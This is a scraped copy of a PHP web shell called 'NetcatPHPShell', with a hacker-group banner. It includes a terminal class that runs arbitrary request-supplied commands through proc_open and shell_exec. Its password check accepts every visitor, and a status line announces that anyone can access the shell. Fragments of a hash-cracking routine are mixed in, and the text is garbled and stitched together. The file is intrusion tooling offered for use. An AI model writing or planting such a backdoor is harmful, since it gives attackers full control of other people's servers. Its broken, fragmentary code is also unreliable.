Lock is Switched Off! , The shell can be accessed by anyone!
[]======================================[] []-----------NetcatPHPShell-------------[] []---------------Private----------------[] []======================================[] [] ––•(-• c0d3d by Mr.H4rD3n •-)•–– [] []======================================[] [] NetcatPHPShell Released on 11/04/12 [] []======================================[] [] WeLcOmE Master Of The Server ! [] []======================================[] [] Moroccan Hackers [] [] Moroccan C0d3r [] [] Moroccan Masters [] []======================================[] [] MaD In MoRoCcO [] []======================================[] [] [] [] Netcat PHP Connect to Server [] [] [] []======================================[] [] My Groupe IsLamiC Warrior Team [] []======================================[] [] Email: exploit-id@hotmail.com [] [] Facebook : Facebook.com/Mr.H4rD3n [] []======================================[] |
|
Hash or List invalid!
"; } else { $pwdList = fread($fd,512); $pwdList = explode("\n",$pwdList); echo "Words Checked :-Planintext : $pwd
"; } } } } //------------------------------------------------------------------------------------------------ ?>'ls -la', 'll' => 'ls -lvhF', 'dir' => 'ls' ); $passwd = array('' => ''); error_reporting(0); class phpTerm { function formatPrompt() { $user=shell_exec("whoami"); $host=explode(".", shell_exec("uname -n")); $_SESSION['prompt'] = "".rtrim($user).""."@"."".rtrim($host[0]).""; } function checkPassword($passwd) { if(!isset($_SERVER['PHP_AUTH_USER'])|| !isset($_SERVER['PHP_AUTH_PW']) || !isset($passwd[$_SERVER['PHP_AUTH_USER']]) || $passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) { @session_start(); return true; } else { @session_start(); return true; } } function initVars() { if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd'] = getcwd(); $_SESSION['history'] = array(); $_SESSION['output'] = ''; $_REQUEST['command'] =''; } } function buildCommandHistory() { if(!empty($_REQUEST['command'])) { if(get_magic_quotes_gpc()) { $_REQUEST['command'] = stripslashes($_REQUEST['command']); } // drop old commands from list if exists if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) { unset($_SESSION['history'][$i]); } array_unshift($_SESSION['history'], $_REQUEST['command']); // append commmand */ $_SESSION['output'] .= "{$_SESSION['prompt']}".":>"."{$_REQUEST['command']}"."\n"; } } function buildJavaHistory() { // build command history for use in the JavaScript if (empty($_SESSION['history'])) { $_SESSION['js_command_hist'] = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"'; } } function outputHandle($aliases) { if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = getcwd(); //dirname(__FILE__); } elseif(ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { // The current command is 'cd', which we have to handle as an internal shell command. // absolute/relative path ?" ($regs[1][0] == '/') ? $new_dir = $regs[1] : $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; // cosmetics while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if(empty($new_dir)): $new_dir = "/"; endif; (@chdir($new_dir)) ? $_SESSION['cwd'] = $new_dir : $_SESSION['output'] .= "could not change to: $new_dir\n"; } else { /* The command is not a 'cd' command, so we execute it after * changing the directory and save the output. */ chdir($_SESSION['cwd']); /* Alias expansion. */ $length = strcspn($_REQUEST['command'], " \t"); $token = substr(@$_REQUEST['command'], 0, $length); if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); $p = proc_open(@$_REQUEST['command'], array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); /* Read output sent to stdout. */ while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8'); } /* Read output sent to stderr. */ while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } } // end phpTerm /*########################################################## ## The main thing starts here ## All output ist XHTML ##########################################################*/ $terminal=new phpTerm; @session_start(); $terminal->initVars(); $terminal->buildCommandHistory(); $terminal->buildJavaHistory(); if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif; $terminal->outputHandle($aliases); header('Content-Type: text/html; charset=UTF-8'); echo '' . "\n"; ?>
-------------------------------------------------------------------------------------
–––•(-• © Copyright Mr.H4rD3n [ All rights reserved ] •-)•––
-------------------------------------------------------------------------------------
Get Commands to Server - Bypass
X | |
PWD : | |